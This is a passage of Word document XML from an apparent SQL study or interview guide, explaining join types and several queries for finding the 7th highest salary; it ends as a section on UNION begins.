          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns rows when there is a match in either the left or the right table. If there is no match, NULL values will appear for the columns of the table that has no match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284926D"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to return all records from both tables, with NULL for non-matching rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F21FF6"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0FB55"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76B2FC"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD55D8"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FULL OUTER JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659339AD"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C188580" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return all employees and all departments. Employees who don't belong to a department and departments without employees will have NULL values in the corresponding columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C66FAB" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6C9BD"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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the Cartesian product of the two tables, i.e., it joins every row from the first table with every row from the second table. It is usually used for creating combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566309A"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lastRenderedPageBreak/>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rarely used, but useful for generating combinations of rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C634EB9"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFF3AF"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ELECT e.employee_name, p.project_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC470AC"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67231FC5"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CROSS JOIN projects p;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986A5A1" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return all possible combinations of employees and projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CDBE4" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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SELF JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCA1D4"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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A self join is a join where a table is joined with itself. This is useful when a table has a hierarchical relationship or when you need to compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39205A"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AEA79"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221EC43"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ELECT e1.employee_name, e2.employee_name AS manager_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71AB0C"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FROM employees e1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BBA3A1"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JOIN employees e2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A814123"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ON e1.manager_id = e2.employee_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACB9E5" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return employees and their managers from the same employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6492C2" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26" w:rsidP="00393B05">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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295EED07" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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Joins allow you to combine related data across multiple tables, making your queries more efficient and reducing redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7E322" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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The type of join you use depends on your requirements for which records you want to retrieve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E917507"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INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only matched records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D437A0B"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LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from the left table, and matching records from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADAC12"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RIGHT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from the right table, and matching records from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF1198"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FULL JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from both tables, with NULLs for non-matching records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442D327"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CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cartesian product (all possible combinations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB5E53" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26" w:rsidP="00393B05">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SELF JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A table joined with itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E8A38" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26" w:rsidP="00393B05">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Understanding joins and how they work is crucial for efficiently querying relational databases, especially when the data is normalized and spread across multiple related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A7200" w14:textId="1D3942E1" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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5A3852F">
          <v:rect id="_x0000_i2990" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4A20D" w14:textId="0E898CF3" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="00C2348B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="713" w:name="_Toc196308193"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="000B4C26" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>uery</w:t>
      </w:r>
      <w:r w:rsidR="000B4C26" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>7th highest salary of an employee</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="713"/>
    </w:p>
    <w:p w14:paraId="71BC6457" w14:textId="3FF96F45" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00D07F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7th highest salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the employee table, you can use a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DISTINCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIMIT/ROW_NUMBER()</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (depending on your SQL flavor). Here's how you can do it for different SQL databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63625B42" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Method 1: Using LIMIT (for MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53E458"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If you are using MySQL or PostgreSQL, you can use the LIMIT and OFFSET clauses to skip the first 6 records and return the 7th record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606BD6FD"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ELECT DISTINCT salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24238BA4"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FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0E35B"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ORDER BY salary DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EC631"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LIMIT 1 OFFSET 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD61F1E"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74A028" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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ORDER BY salary DESC: Orders the salaries in descending order, so the highest salary comes first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E310BDA" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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LIMIT 1 OFFSET 6: Skips the first 6 records and fetches the next one, which will be the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA084A3" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Method 2: Using ROW_NUMBER() (for SQL Server, Oracle, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D1DE8"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For databases like SQL Server or Oracle that support window functions, you can use ROW_NUMBER() to assign a rank to each salary, then filter the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71412C10"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WITH RankedSalaries AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C445978"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  SELECT salary, ROW_NUMBER() OVER (ORDER BY salary DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152953F2"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  FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D862E6C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFD853"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ELECT salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280AC1FE"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FROM RankedSalaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0FEF2"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WHERE rank = 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01634D"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B758F" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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The ROW_NUMBER() function generates a unique row number for each record based on the order of the salary in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E111" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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lastRenderedPageBreak/>
        <w:t>The WHERE rank = 7 filters the result to return only the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C1528" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Method 3: Using DENSE_RANK() (for SQL Server, PostgreSQL, Oracle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03745A0E"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If you have duplicate salaries and you want to get the 7th highest distinct salary, you can use DENSE_RANK() to rank salaries without skipping any ranks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF793E"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WITH RankedSalaries AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB152A"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  SELECT salary, DENSE_RANK() OVER (ORDER BY salary DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7DDB4"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  FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4000F604"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEAD70F"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ELECT salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F495D6C"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FROM RankedSalaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91E58D"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WHERE rank = 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34205307"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DF04F" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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DENSE_RANK() will rank rows without skipping ranks even if there are ties. For example, if two employees have the same salary as the 2nd highest, the next salary will be ranked as 3rd, not 4th.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298EC74" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method 4: Using Subquery (for any SQL database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3EB3E"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Another universal approach is to use a subquery to get the 7th highest salary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24547FD8"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SELECT MAX(salary) AS 7th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B93E89"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FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0E908"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WHERE salary NOT IN (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918BAE4"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    SELECT salary FROM employee ORDER BY salary DESC LIMIT 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C66E47"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B819580"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25512512" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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The subquery fetches the top 6 highest salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507E7A6" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The main query finds the maximum salary that is not in the list of top 6, which will give the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EA96B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00AF73E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C3B8078">
          <v:rect id="_x0000_i2991" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C626BD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose the appropriate method based on the SQL database you are using. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROW_NUMBER()</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods are particularly useful when you need to handle ties in the salary values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4F92B" w14:textId="162222B4" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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9E37592">
          <v:rect id="_x0000_i2992" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4301B3" w14:textId="60C5A486" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D171E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="714" w:name="_Toc196308194"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Union in SQL</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
